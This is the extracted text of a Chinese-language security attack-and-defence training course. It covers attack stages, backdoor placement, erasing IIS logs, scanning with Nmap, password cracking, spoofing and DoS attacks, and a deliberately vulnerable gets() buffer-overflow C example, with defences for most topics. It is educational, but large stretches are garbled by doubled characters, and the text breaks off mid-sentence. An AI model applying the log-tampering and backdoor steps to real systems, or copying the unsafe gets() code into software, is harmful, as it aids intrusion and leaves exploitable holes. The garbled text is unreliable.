




版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
安全攻防實(shí)踐穆顯亮課程內(nèi)容2安全攻防知識(shí)體知識(shí)域安全攻防基礎(chǔ)網(wǎng)絡(luò)攻擊基本概念術(shù)語(yǔ)安全漏洞基礎(chǔ)安全攻防實(shí)踐緩沖區(qū)溢出原理與實(shí)例攻擊目標(biāo)信息收集密碼破解原理與實(shí)例拒絕服務(wù)攻擊原理與實(shí)例網(wǎng)頁(yè)腳本攻擊原理與實(shí)例欺騙攻擊原理與實(shí)例安全漏洞檢測(cè)滲透測(cè)試基本流程知識(shí)子域信息安全漏洞知識(shí)域:安全攻防基礎(chǔ)知識(shí)子域:網(wǎng)絡(luò)攻擊基本概念術(shù)語(yǔ)了解網(wǎng)絡(luò)攻擊的基本常識(shí)了解黑客攻擊的常用術(shù)語(yǔ)知識(shí)子域:網(wǎng)絡(luò)攻擊基本流程了解網(wǎng)絡(luò)攻擊的基本步驟了解網(wǎng)絡(luò)攻擊各個(gè)階段常用的攻擊手段和工具3網(wǎng)絡(luò)攻擊基本概念及術(shù)語(yǔ)網(wǎng)絡(luò)攻擊的方式主動(dòng)攻擊:掃描、滲透、拒絕服務(wù)……被動(dòng)攻擊:嗅探、釣魚(yú)……一些術(shù)語(yǔ)后門(mén)、RootKit0-day提權(quán)社會(huì)工程學(xué)BotNet(僵尸網(wǎng)絡(luò))B/S(Browser/Server)……4攻擊的過(guò)程5踩點(diǎn)定位入侵留后門(mén)抹去痕跡信息收集分析目標(biāo)實(shí)施攻擊方便再次進(jìn)入清理入侵記錄踩點(diǎn)-信息收集6具體見(jiàn)后面介紹為什么要收集信息獲取攻擊目標(biāo)大概信息網(wǎng)絡(luò)信息主機(jī)信息應(yīng)用部署信息……指導(dǎo)下一步攻擊行為信息收集的方式社會(huì)工程學(xué)媒體(如搜索引擎、廣告介紹等)網(wǎng)絡(luò)工具的探測(cè)定位-分析目標(biāo)為什么需要分析目標(biāo)確定收集信息的準(zhǔn)確性更準(zhǔn)確的判斷(例如:index.ycs是java開(kāi)發(fā),開(kāi)發(fā)人員修改了腳本后綴以迷惑攻擊者)攻擊方式及工具路徑的選擇分析目標(biāo)的方法掃描漏洞庫(kù)論壇等交互應(yīng)用7入侵-多種多樣的入侵方式針對(duì)配置錯(cuò)誤的攻擊-IPC$的攻擊針對(duì)應(yīng)用漏洞的攻擊-unicode緩沖區(qū)溢出攻擊-idq緩沖區(qū)溢出電子欺騙攻擊-ARP欺騙拒絕服務(wù)攻擊-synflood針對(duì)弱口令的攻擊-口令破解利用服務(wù)的漏洞-本地輸入法漏洞利用應(yīng)用腳本開(kāi)發(fā)的漏洞-SQL注入利用人的心理-社會(huì)工程學(xué)攻擊……8后門(mén)可以作什么方便下次直接進(jìn)入監(jiān)視用戶所有行為、隱私完全控制用戶主機(jī)后門(mén)放置方式如果已經(jīng)入侵簡(jiǎn)單!如果尚未入侵手動(dòng)放置利用系統(tǒng)漏洞,遠(yuǎn)程植入利用系統(tǒng)漏洞,誘騙執(zhí)行后門(mén)-方便下次進(jìn)入9特洛洛伊伊木木馬馬隨系系統(tǒng)統(tǒng)自自啟啟動(dòng)動(dòng)修改改注注冊(cè)冊(cè)表表服務(wù)務(wù)Ini文件件RootKit設(shè)備備驅(qū)驅(qū)動(dòng)動(dòng)腳本本后后門(mén)門(mén)難以以查查找找隱藏藏賬賬號(hào)號(hào)考驗(yàn)驗(yàn)管管理理人人員員耐耐心心與與細(xì)細(xì)心心后門(mén)門(mén)-方式式10改寫(xiě)寫(xiě)訪訪問(wèn)問(wèn)日日志志例如如::IIS訪問(wèn)問(wèn)日日志志位位置置%WinDir%\System32\LogFiles\W3SVC1\exyymmdd.log改寫(xiě)寫(xiě)日日志志的的技技巧巧修改改系系統(tǒng)統(tǒng)日日期期刪除除中中間間文文件件刪除除創(chuàng)創(chuàng)建建的的用用戶戶抹去去痕痕跡跡11信息息收收集集與與密密碼碼破破解解知識(shí)識(shí)子子域域::攻攻擊擊目目標(biāo)標(biāo)信信息息收收集集了解解目目標(biāo)標(biāo)系系統(tǒng)統(tǒng)網(wǎng)網(wǎng)絡(luò)絡(luò)地地址址、、軟軟件件版版本本等等信信息息獲獲取取方方式式了解解網(wǎng)網(wǎng)絡(luò)絡(luò)設(shè)設(shè)備備、、系系統(tǒng)統(tǒng)軟軟件件、、應(yīng)應(yīng)用用軟軟件件掃掃描描攻攻擊擊的的常常用用工工具具知識(shí)識(shí)子子域域::密密碼碼破破解解原原理理與與實(shí)實(shí)例例了解解密密碼碼破破解解技技術(shù)術(shù)原原理理和和口口令令安安全全基基本本知知識(shí)識(shí)了解解密密碼碼破破解解常常用用工工具具及及密密碼碼字字典典概概念念12信息息收收集集技技術(shù)術(shù)公開(kāi)開(kāi)信信息息的的合合理理利利用用及及分分析析IP及域域名名信信息息收收集集主機(jī)機(jī)及及系系統(tǒng)統(tǒng)信信息息收收集集系統(tǒng)統(tǒng)服服務(wù)務(wù)信信息息的的收收集集系統(tǒng)統(tǒng)、、服服務(wù)務(wù)及及應(yīng)應(yīng)用用漏漏洞洞信信息息收收集集13信息息收收集集技技術(shù)術(shù)-公開(kāi)開(kāi)信信息息的的分分析析公開(kāi)開(kāi)信信息息的的合合理理利利用用和和分分析析-信息息后后面面能能反反饋饋出出什什么么??從著著名名的的”照片片泄泄密密”案件件到到““如如何何用用google入侵侵網(wǎng)網(wǎng)站站””1964年《中國(guó)國(guó)畫(huà)畫(huà)報(bào)報(bào)》封面面衣著著判判斷斷::北北緯緯46度至至48度的的區(qū)區(qū)域域-齊齊齊哈哈爾爾與與哈哈爾爾濱濱之之間間所握握手手柄柄的的架架式式->油井井的的直直徑徑鉆井井與與背背后后油油田田間間的的距距離離和和井井架架密密度度->儲(chǔ)量量和和產(chǎn)量量因此此設(shè)設(shè)計(jì)計(jì)出出適適合合中中國(guó)國(guó)大大慶慶的的設(shè)設(shè)備備,,一一舉舉中中標(biāo)標(biāo)14信息息收集集技技術(shù)術(shù)-搜索索引引擎擎網(wǎng)站站信信息息舉例例::某某網(wǎng)網(wǎng)絡(luò)絡(luò)提提供供商商在在其其網(wǎng)網(wǎng)站站上上宣宣傳傳“特特惠惠服服務(wù)務(wù)器器租租用用::RedHatLinux8.0支持持MYSQL/PHP采用用性性能能優(yōu)優(yōu)異異的的Apache1.3.XXWeb服務(wù)務(wù)器器””搜索索引引擎擎Google搜索索例::某某Web服務(wù)務(wù)器器存存在在致致命命錯(cuò)錯(cuò)誤誤腳腳本本““5sf67.jsp””攻擊擊者者可可通通過(guò)過(guò)搜搜索索引引擎擎查查找找存存在在該該錯(cuò)錯(cuò)誤誤腳腳本本的的網(wǎng)網(wǎng)站站15信息息收收集集技技術(shù)術(shù)-域名名與與IP查詢?cè)?6域名名與與IP信息息收收集集─WhoisWhois是一個(gè)標(biāo)標(biāo)準(zhǔn)服務(wù)務(wù),可以用來(lái)查詢域域名是否被注冊(cè)以及注冊(cè)的詳細(xì)資料料Whois可以查詢?cè)兊降男判畔⒂蛎杏姓哂蛎癐P地址對(duì)應(yīng)應(yīng)信息聯(lián)系方式式域名到期日期期域名注冊(cè)冊(cè)日期域名所使用的的DNSServers……信息收集集技術(shù)-域名與IP查詢17域名與IP查詢─nslookup操作系統(tǒng)統(tǒng)自帶命命令,主要是用來(lái)查詢域域名名稱稱和IP之間的對(duì)應(yīng)關(guān)系網(wǎng)絡(luò)狀況況查詢─Ping系統(tǒng)自帶帶命令,,測(cè)試與遠(yuǎn)端電電腦或網(wǎng)絡(luò)設(shè)備備的連接狀況網(wǎng)絡(luò)路徑徑狀況查查詢─tracert系統(tǒng)自帶帶命令,,測(cè)試與與遠(yuǎn)端電電腦或網(wǎng)絡(luò)設(shè)備備之間的路徑信息收集集技術(shù)-系統(tǒng)鑒別別1.DNS的hinfo紀(jì)錄2.Bannergrab3.二進(jìn)制文文件法4.TCP/IP協(xié)議棧檢檢測(cè)法5.ICMP堆棧指紋紋技術(shù)18系統(tǒng)鑒別別-DNS的hinfo記錄19系統(tǒng)鑒別別-服務(wù)旗標(biāo)標(biāo)檢測(cè)服務(wù)旗標(biāo)標(biāo)檢測(cè)法法[root@pooh]#telnet3DebianGNU/Linux2.1targetlogin:Redhat:/etc/issue、/etc/bsd:/etc/motdSolaris:/etc/motd缺陷:不不準(zhǔn)確,,負(fù)責(zé)任任的管理理員一般般都修改改這個(gè)文文件20FTP回顯信息操作系統(tǒng)回顯Web回顯信息系統(tǒng)鑒別別-二進(jìn)制文文件分析析法得到遠(yuǎn)程程系統(tǒng)的的一個(gè)二二進(jìn)制文文件例如1.webserver目錄下產(chǎn)產(chǎn)生的core文件2.配置不當(dāng)當(dāng)?shù)膄tpserver下的二進(jìn)進(jìn)制文件件……利用file、readelf命令等來(lái)來(lái)鑒別21系統(tǒng)鑒別別-TCP/IP協(xié)議棧檢檢測(cè)法其原理是是不同廠廠家的IP協(xié)議棧實(shí)實(shí)現(xiàn)之間間存在許許多細(xì)微微的差別別,通過(guò)過(guò)這些差差別就能能對(duì)目標(biāo)標(biāo)系統(tǒng)的的操作系系統(tǒng)加以以猜測(cè)。。主動(dòng)檢測(cè)測(cè)被動(dòng)檢測(cè)測(cè)22系統(tǒng)鑒別別-ICMP堆棧指紋紋技術(shù)23通過(guò)端口口掃描確確定主機(jī)開(kāi)放放的端口口,不同的端端口對(duì)應(yīng)應(yīng)運(yùn)行著的的不同的的網(wǎng)絡(luò)服服務(wù)端口測(cè)試試數(shù)據(jù)包包測(cè)試響應(yīng)應(yīng)數(shù)據(jù)包包信息收集集技術(shù)-端口掃描描我知道主主機(jī)上開(kāi)開(kāi)放的端端口了24端口掃描描類型常規(guī)掃描描(tcpconnectscan)半打開(kāi)掃掃描(tcpsynscan)隱秘掃描((StealthScan)SYN/ACKscan:發(fā)送一個(gè)個(gè)SYN/ACK分組,測(cè)知防火墻墻的規(guī)則設(shè)設(shè)計(jì)。它可可確定防火火墻是否只只是簡(jiǎn)單的的分組過(guò)濾濾(只允許已建建立好的連連接);還是一個(gè)個(gè)基于狀態(tài)態(tài)的防火墻墻(可執(zhí)行高級(jí)級(jí)的分組過(guò)過(guò)濾)FINscan:發(fā)送FIN分組,目標(biāo)標(biāo)系統(tǒng)應(yīng)給給所有關(guān)閉閉著的端口口發(fā)回一個(gè)個(gè)RST分組,這種種技巧通常常只工作在在基于UNIX的TCP/IP協(xié)議上;Xmasscan:這一技巧巧是往目標(biāo)標(biāo)端口發(fā)送送一個(gè)FIN、URG、PUSH置位的分組組,如果目目標(biāo)端口關(guān)關(guān)閉,則返返回一個(gè)RST分組;Nullscan:發(fā)送所有有標(biāo)識(shí)位復(fù)復(fù)位的TCP分組;UDP掃描25端口掃描-常規(guī)掃描26掃描的方法──TCPConnectScan主要是利用用TCP三次握手(Three-wayhandshaking)的連接方式來(lái)達(dá)到掃描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPConnectScan端口掃描-半打開(kāi)掃描描27掃描的方法──TCPSYNScan沒(méi)有完成三三次握手如左上圖,當(dāng)主機(jī)A收到主機(jī)B的回應(yīng)后,並不會(huì)回傳ACK數(shù)據(jù)包給主機(jī)B。TCPSYNScan的優(yōu)缺點(diǎn)優(yōu)點(diǎn):由于沒(méi)有完成TCP三次握手,所以不會(huì)在目標(biāo)主機(jī)上留下記錄。缺點(diǎn):需有管理者的權(quán)限才可執(zhí)行TCPSYNScan(以左上圖為例,必需要有主機(jī)A的管理者權(quán)限)。AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPSYNScan端口掃描-UDP掃描28掃描的方法──UDPPortScan由掃描主機(jī)發(fā)發(fā)出UDP數(shù)據(jù)包給目標(biāo)主機(jī)機(jī)的UDPPort,並等待目目標(biāo)主機(jī)Port送回ICMPUnreachable信息。若收到目標(biāo)主機(jī)Port傳回的ICMPUnreachable信息,則表示該P(yáng)ort處于關(guān)閉的狀態(tài)。若沒(méi)有收到到目標(biāo)主機(jī)Port傳回的ICMPUnreachable信息,則表示該P(yáng)ort可能處于Listen狀態(tài)。UDPPortScan的缺點(diǎn)UDP協(xié)議不可靠可能被防火火墻過(guò)濾掉使用Nmap做udpScan端口掃描策策略隨機(jī)端口掃掃描慢掃描碎片掃描欺騙掃描……29信息收集技技術(shù)-漏洞掃描根據(jù)目標(biāo)主主機(jī)開(kāi)放的的不同應(yīng)用用和服務(wù)來(lái)來(lái)掃描和判判斷是否存存在或可能能存在某些些漏洞意義進(jìn)行網(wǎng)絡(luò)安安全評(píng)估為網(wǎng)絡(luò)系統(tǒng)統(tǒng)的加固提提供先期準(zhǔn)準(zhǔn)備被網(wǎng)絡(luò)攻擊擊者加以利利用來(lái)獲取取重要的數(shù)數(shù)據(jù)信息30對(duì)一個(gè)信息息系統(tǒng)來(lái)說(shuō)說(shuō),它的安安全性不在在于它是否否采用了最最新的加密密算法或最最先進(jìn)的設(shè)設(shè)備,而是是由系統(tǒng)本本身最薄弱弱之處,即即漏洞所決決定的。只只要這個(gè)漏漏洞被發(fā)現(xiàn)現(xiàn),系統(tǒng)就就有可能成成為網(wǎng)絡(luò)攻攻擊的犧牲牲品。信息安全的的“木桶理論”31信息收集技技術(shù)-漏洞掃描工工具網(wǎng)絡(luò)設(shè)備漏漏洞掃描器器CiscoAuditingTools集成化的漏漏洞掃描器器NessusShadowSecurityScannereEye的RetinaInternetSecurityScannerGFILANguard專業(yè)web掃描軟件IBMappscanAcunetixWebVulnerability數(shù)據(jù)庫(kù)漏洞洞掃描器ISSDatabaseScanneroscannerOracle數(shù)據(jù)庫(kù)掃描描器Metacoretex數(shù)據(jù)安全審審計(jì)工具工具介紹-端口掃描Nmap簡(jiǎn)介被稱為“掃掃描器之王王”有forUnix和forWin的兩種版本本需要Libpcap庫(kù)和Winpcap庫(kù)的支持能夠進(jìn)行普普通掃描、、各種高級(jí)級(jí)掃描和操操作系統(tǒng)類類型鑒別等等使用-sS:半開(kāi)式掃描描-sT:普通connect()掃描-sU:udp端口掃描-O:操作系統(tǒng)鑒鑒別-P0:強(qiáng)行掃描((無(wú)論是否否能夠ping通目標(biāo))-p:指定端口范范圍-v:詳細(xì)模式式32工具介紹紹-端口掃描描SuperScan簡(jiǎn)介基于Windows平臺(tái)速度快,,圖形化化界面使用傻瓜化33工具介紹紹-漏洞掃描描Nessus構(gòu)架服務(wù)器端端:基于于Unix系統(tǒng)客戶端::有GTK、Java和Win系統(tǒng)支持持運(yùn)作客戶端連連接服務(wù)務(wù)器端,,并下載載插件和和掃描策策略真正的掃掃描由服服務(wù)器端端發(fā)起兩者之間間的通信信通過(guò)加加密認(rèn)證證優(yōu)勢(shì):具有強(qiáng)大大的插件件功能完全免費(fèi)費(fèi),升級(jí)級(jí)快速非常適合合作為網(wǎng)網(wǎng)絡(luò)安全全評(píng)估工工具34工具介紹紹-漏洞掃描描X-Scan國(guó)產(chǎn)自主主開(kāi)發(fā)完全免費(fèi)費(fèi)比較古老老,缺乏乏維護(hù)35工具介紹紹-web安全掃描描IBMAppScan36AcunetixWebVulnerabilityScanner優(yōu)秀的Web安全測(cè)試試軟件37密碼破解解-利用人性性懶惰38密碼破解解方法密碼窮舉暴力破解密碼工具具密碼暴力破破解工具具密碼字典生生成工具具密碼破解解-密碼窮舉舉39密碼明文對(duì)明文密碼進(jìn)行加密對(duì)比密文更換密碼明文已知密碼碼加密算算法及密密文情況況下的破破解方法法ID:cisppsw:123456Ok,youcanlogininID:cisppsw:No,youcannotloginin112123123412345123456OK,youcanlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotloginin密碼破解解-口令暴力力猜解40破解工具具JohntheRipperL0Phtcrack……41根據(jù)用戶戶規(guī)則快快速生成成各類密密碼字典典提高密碼碼破解效效率密碼破解知知識(shí)的具具體體現(xiàn)現(xiàn)攻擊者常常用的工工具……字典生成成器42系統(tǒng)及應(yīng)用用安全策策略對(duì)抗抗密碼限制密碼碼嘗試次次數(shù)限制必須須提供安安全的密密碼密碼有效效期等好的密碼碼特征自己容易記記住,別別人不好好猜……密碼破解安安全防御御43欺騙攻擊擊與拒絕絕服務(wù)攻攻擊44知識(shí)子域域:欺騙攻擊擊原理與與實(shí)例理解IP欺騙、ARP欺騙、DNS欺騙的原原理和危危害了解防范范欺騙攻攻擊的基基本方法法知識(shí)子域域:拒絕服務(wù)務(wù)工具原原理與實(shí)實(shí)例理解SYNFlood、UDPFlood、Land攻擊、TearDrop攻擊等典典型DoS攻擊的原原理及危危害理解DDoS攻擊的原原理了解防范范DoS/DDoS攻擊的基基本方法法欺騙攻擊擊定義BACHello,I’mB!欺騙攻擊擊(Spoofing)是指通通過(guò)偽造造源于可可信任地地址的數(shù)數(shù)據(jù)包以以使一臺(tái)臺(tái)機(jī)器認(rèn)認(rèn)證另一一臺(tái)機(jī)器器的復(fù)雜雜技術(shù)45欺騙攻擊擊的主要要方式IP欺騙(IPSpoof)DNS欺騙ARP欺騙TCP會(huì)話劫持持路由欺騙騙……46客戶服務(wù)器Synsend連接請(qǐng)求求回應(yīng)(ISN)Syn+ack確認(rèn)(ISN+1)會(huì)話過(guò)程程47IP欺騙基礎(chǔ)知識(shí)識(shí)-三次握手IP欺騙實(shí)現(xiàn)步驟IP欺騙攻擊方法法中包括了一一系列攻擊步驟確認(rèn)攻擊目標(biāo)使要冒充主機(jī)無(wú)法響應(yīng)目標(biāo)主機(jī)猜正確的序數(shù)冒充受信主機(jī)進(jìn)行會(huì)話48IP欺騙實(shí)例講解BAC同步flood攻擊連接請(qǐng)求偽造B進(jìn)行系列會(huì)話話A的序數(shù)規(guī)則49防止IP欺騙50嚴(yán)格設(shè)置路由由策略:拒絕來(lái)自網(wǎng)網(wǎng)上,且聲明明源于本地地地址的包使用最新的系系統(tǒng)和軟件,,避免會(huì)話序序號(hào)被猜出使用抗IP欺騙功能的產(chǎn)產(chǎn)品嚴(yán)密監(jiān)視網(wǎng)絡(luò)絡(luò),對(duì)攻擊進(jìn)進(jìn)行報(bào)警ARP欺騙基礎(chǔ)-Arp協(xié)議工作過(guò)程程bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaWho’sIPisWho’sIPis192.168.1.aMACaa:aa:aa:aa:isIsee,Iwillcache51ARP欺騙實(shí)現(xiàn)bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaMACcc:cc:cc:cc:ccisIsee,IwillcacheMACdf:df:df:df:dfisIcouldn’tfind52Internet地址物物理理地址cc:cc:cc:cc:ccARP欺騙防御53使用靜態(tài)ARP緩存IP與MAC地址綁定ARP防御工具DNS欺騙基礎(chǔ)-DNS協(xié)議工作過(guò)程程其他DNSIwillcacheIdon’tknow,IwillaskotherIt’sinmycache54DNS服務(wù)器客戶機(jī)客戶機(jī)DNS服務(wù)器DNS欺騙實(shí)現(xiàn)Idon’tknow,IwillaskotherOtherDNSIwillcacheIt’sinmycache55攻擊者DNS服務(wù)器DNS服務(wù)器客戶機(jī)DNS欺騙防御56安裝最新版本本的DNS軟件安全設(shè)置對(duì)抗抗DNS欺騙關(guān)閉DNS服務(wù)遞歸功能能限制域名服務(wù)務(wù)器作出響應(yīng)應(yīng)的地址限制域名服務(wù)務(wù)器作出響應(yīng)應(yīng)的遞歸請(qǐng)求求地址限制發(fā)出請(qǐng)求求的地址其他欺騙攻擊擊-路由欺騙ICMP重定向報(bào)文欺騙RIP路由欺騙源徑路由欺騙騙57拒絕服務(wù)攻擊擊定義拒絕服務(wù)式攻攻擊(DenialofService),顧名思義就就是讓被攻擊擊的系統(tǒng)無(wú)法法正常進(jìn)行服服務(wù)的攻擊方方式。拒絕服務(wù)攻擊擊方式利用大量數(shù)據(jù)據(jù)擠占網(wǎng)絡(luò)帶帶寬利用大量請(qǐng)求求消耗系統(tǒng)性性能利用協(xié)議實(shí)現(xiàn)現(xiàn)缺陷利用系統(tǒng)處理理方式缺陷58典型的拒絕服服務(wù)攻擊方式式SYNFloodUDPFloodTeardropLANDSmurf……59(syn)Hello,I’mhere(syn+ack)I’mready?I’mwaiting………SYNFlood(syn)Hello,I’mhere?I’mwaiting………(syn)Hello,I’mhere………I’mwaiting………I’mwaiting………I’mwaiting………UDPFLOODUDPFlood1)大大量量UDP小包包沖沖擊擊應(yīng)應(yīng)用用服服務(wù)務(wù)器器((DNS、Radius認(rèn)證證等等))2)利利用用系系統(tǒng)統(tǒng)服服務(wù)務(wù)形形成成流流量量((Echochargen)3)利用用正正常常UDP服務(wù)務(wù)發(fā)發(fā)送送大大流流量量形形成成網(wǎng)網(wǎng)絡(luò)絡(luò)擁?yè)砣?1LAND攻擊擊運(yùn)用用IPSpoofing技術(shù)術(shù)送送出出一一連連串串SYN數(shù)據(jù)據(jù)包包給給目目標(biāo)標(biāo)主主機(jī)機(jī),,讓讓目目標(biāo)標(biāo)主主機(jī)機(jī)系系統(tǒng)統(tǒng)誤誤以以為為這這些些數(shù)數(shù)據(jù)據(jù)包包是是由由自自己己發(fā)發(fā)送送的的。。由由于于目目標(biāo)標(biāo)主主機(jī)機(jī)在在處處理理這這些些數(shù)數(shù)據(jù)據(jù)包包的的時(shí)時(shí)候候,,它它自自己己并并無(wú)無(wú)法法回回應(yīng)應(yīng)給給自自己己SYN-ACK數(shù)據(jù)據(jù)包包,,因因而而造造成成系系統(tǒng)統(tǒng)當(dāng)當(dāng)機(jī)機(jī)。。621(SYN)hello,I’m1Syn+AckAckSYNSYN+ACKACKPSH1:1025………PSH1025:2049………PSH2049:3073………FINACKPSH1:1025………PSH1000:2049………PSH2049:3073………試圖圖重重組組時(shí)時(shí)主機(jī)機(jī)崩崩潰潰TearDrop(分分片片攻攻擊擊))63Smurf攻擊擊黑客客偽裝裝受受害害者者IP中間間網(wǎng)網(wǎng)站站目標(biāo)標(biāo)子子網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)目標(biāo)標(biāo)子子網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)目標(biāo)標(biāo)子子網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)攻擊擊信信息息大量量ICMP封包(Layer3)子網(wǎng)網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)子網(wǎng)網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)子網(wǎng)網(wǎng)絡(luò)絡(luò)主主機(jī)機(jī)目標(biāo)標(biāo)網(wǎng)網(wǎng)站站大量量廣廣播播(Layer2)64拒絕絕服服務(wù)務(wù)攻攻擊擊的的危危害害消耗耗帶帶寬寬癱瘓瘓服服務(wù)務(wù)器器DNS網(wǎng)頁(yè)頁(yè)電子子郵郵件件阻塞塞網(wǎng)網(wǎng)絡(luò)絡(luò)路由由器器交換換器器65DDoS攻擊擊原原理理66工具具介介紹紹TFN2KTrinoo67313352766527444udpmasterclient..主機(jī)機(jī)列列表表telnetbetaalmostdone攻擊擊指指令令目標(biāo)標(biāo)主機(jī)機(jī)nc拒絕絕服服務(wù)務(wù)攻攻擊擊防防御御定期期掃掃描描過(guò)濾濾不不必必要要的的端端口口與與服服務(wù)務(wù)節(jié)點(diǎn)點(diǎn)配配置置防防火火墻墻/DDOS設(shè)備備過(guò)濾濾IP地址址限制制SYN/ICMP流量量檢查查來(lái)來(lái)源源68緩沖沖區(qū)區(qū)溢溢出出與與網(wǎng)網(wǎng)頁(yè)頁(yè)腳腳本本安安全全69知識(shí)識(shí)子子域域::緩緩沖沖區(qū)區(qū)溢溢出出原原理理與與實(shí)實(shí)例例理解解緩緩沖沖區(qū)區(qū)溢溢出出的的原原理理和和危危害害了解解防防范范緩緩沖沖區(qū)區(qū)溢溢出出的的基基本本方方法法知識(shí)識(shí)子子域域::網(wǎng)網(wǎng)頁(yè)頁(yè)腳腳本本原原理理與與實(shí)實(shí)例例理解解SQL注入入攻攻擊擊的的原原理理和和危危害害了解解防防范范SQL注入入攻攻擊擊的的基基本本方方法法理解解跨跨站站腳腳本本攻攻擊擊的的原原理理和和危危害害了解解防防范范跨跨站站腳腳本本攻攻擊擊的的基基本本方方法法緩沖沖區(qū)區(qū)溢溢出出緩沖沖區(qū)區(qū)溢溢出出原原理理緩沖沖區(qū)區(qū)溢溢出出簡(jiǎn)簡(jiǎn)單單示示例例緩沖沖區(qū)區(qū)溢溢出出防防御御70緩沖沖區(qū)區(qū)溢溢出出71原理理緩沖沖區(qū)區(qū)溢溢出出攻攻擊擊利利用用編編寫(xiě)寫(xiě)不不夠夠嚴(yán)嚴(yán)謹(jǐn)謹(jǐn)?shù)牡某坛绦蛐?,,通通過(guò)過(guò)向向程程序序的的緩緩存存區(qū)區(qū)寫(xiě)寫(xiě)入入超超過(guò)過(guò)預(yù)預(yù)定定長(zhǎng)長(zhǎng)度度的的數(shù)數(shù)據(jù)據(jù),,造造成成緩緩存存的的溢溢出出,,從從而而破破壞壞程程序序的的堆堆棧棧,,導(dǎo)導(dǎo)致致程程序序執(zhí)執(zhí)行行流流程程的的改改變變。?;A(chǔ)礎(chǔ)知知識(shí)識(shí)堆棧棧寄存存器器指針針緩沖沖區(qū)區(qū)溢溢出出基基礎(chǔ)礎(chǔ)-堆棧棧及及指指針針堆棧棧概概念念一段連連續(xù)續(xù)分分配配的的內(nèi)內(nèi)存存空空間堆棧棧特特點(diǎn)點(diǎn)后進(jìn)進(jìn)先先出出堆棧棧生生長(zhǎng)長(zhǎng)方方向向與與內(nèi)內(nèi)存存地地址址方方向向相相反反指針針指針針是是指指向向內(nèi)內(nèi)存存單單元元的的地地址址寄存存器有限限存存貯貯容容量量的的高高速速存存貯貯部部件件,,它它們們可可用用來(lái)來(lái)暫暫存存指指令令、、數(shù)數(shù)據(jù)據(jù)和和位位址34H12H78H56H0108HESP棧頂堆棧棧(AL)(AH)34H12H78H56H0106HESP棧頂72棧底棧底簡(jiǎn)單示示例Buffer.c#include<stdio.h>intmain(){charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}73程序作作用::將用戶戶輸入入的內(nèi)內(nèi)容打打印在在屏幕幕上簡(jiǎn)單示示例74用戶輸入內(nèi)容在8位以內(nèi)時(shí)候,程序正常執(zhí)行用戶輸入內(nèi)容超過(guò)8位以后,程序執(zhí)行產(chǎn)生錯(cuò)誤簡(jiǎn)單示示例由于返返回地地址已已經(jīng)被被覆蓋蓋,函函數(shù)執(zhí)執(zhí)行返返回地地址時(shí)時(shí)會(huì)將將覆蓋內(nèi)內(nèi)容當(dāng)作返返回地地址,,然后后試圖圖執(zhí)行行相應(yīng)應(yīng)地址的指令,,從而而產(chǎn)生生錯(cuò)誤誤。75當(dāng)我們們?nèi)坎枯斎肴隺時(shí),錯(cuò)錯(cuò)誤指指令地地址為為0x616161,0x61是a的ASCII編碼76內(nèi)存底底部?jī)?nèi)內(nèi)存存頂部部nameEBPret[cispcisp][][]堆棧頂頂部堆堆棧棧底部部堆棧情況況nameEBPret[aaaaaaaa][aaaa][aaaa]由于輸輸入的的name超過(guò)了了定義義變量量的長(zhǎng)長(zhǎng)度((8位),,堆棧棧中預(yù)預(yù)計(jì)的的位置置無(wú)法法容納納,只只好向內(nèi)內(nèi)存頂頂部繼繼續(xù)寫(xiě)寫(xiě)‘a(chǎn)’,由于堆棧棧的生生長(zhǎng)方方向與與內(nèi)存存的生生長(zhǎng)方方向相相反,用戶輸入入的‘‘a(chǎn)’覆蓋了了堆棧底部EBP和ret。程序序在返返回時(shí)時(shí),將將EBP中的‘‘a(chǎn)aaa’的ASCII碼:0x61616161作為返返回地地址,試圖執(zhí)執(zhí)行0x61616161處指令令,導(dǎo)導(dǎo)致錯(cuò)錯(cuò)誤,,形成成一次次堆棧溢溢出77緩沖區(qū)區(qū)溢出出危害害尋找程序漏洞編制緩沖區(qū)溢出程序精確控制跳轉(zhuǎn)地址執(zhí)行設(shè)定的代碼獲得系統(tǒng)權(quán)限或破壞系統(tǒng)危害::如果果可精精確控控制內(nèi)內(nèi)存跳跳轉(zhuǎn)地地址,,就可可以執(zhí)執(zhí)行指指定代代碼,,獲得得權(quán)限限或破破壞系系統(tǒng)78緩沖區(qū)區(qū)溢出其他他知識(shí)識(shí)緩沖區(qū)區(qū)溢出出分類類堆溢出出棧溢出出Shellcode一段用用于溢溢出并并獲取取權(quán)限限的代代碼……緩沖區(qū)區(qū)溢出出防御御編寫(xiě)安全全代碼最根本本的解解決方方法,,對(duì)輸輸入數(shù)數(shù)據(jù)進(jìn)進(jìn)行驗(yàn)驗(yàn)證緩沖區(qū)不可可執(zhí)行行技術(shù)術(shù)使被攻攻擊程程序的的數(shù)據(jù)據(jù)段地地址空空間不不可執(zhí)執(zhí)行,,從而而使攻擊者不不可能能執(zhí)行輸入緩沖沖區(qū)的的代碼碼指針完整整性檢檢查數(shù)組越界界保護(hù)護(hù)79網(wǎng)頁(yè)腳腳本安安全腳本安安全的的概念念SQL注入原原理及及危害害跨站腳腳本原原理及及危害害80概念腳本攻攻擊是是針對(duì)對(duì)Web應(yīng)用的的攻擊擊腳本攻攻擊主主要是是針對(duì)對(duì)動(dòng)態(tài)態(tài)網(wǎng)站站進(jìn)行行的攻攻擊,,其原原因是是在建建立動(dòng)動(dòng)態(tài)網(wǎng)網(wǎng)頁(yè)的的過(guò)程程中沒(méi)沒(méi)有對(duì)對(duì)用戶戶的輸輸入輸輸出進(jìn)進(jìn)行有有效的的合法法性驗(yàn)驗(yàn)證動(dòng)態(tài)網(wǎng)站站交互性::即網(wǎng)頁(yè)頁(yè)會(huì)根據(jù)據(jù)用戶的的要求和和選擇而而動(dòng)態(tài)改改變和響響應(yīng),將將瀏覽器器作為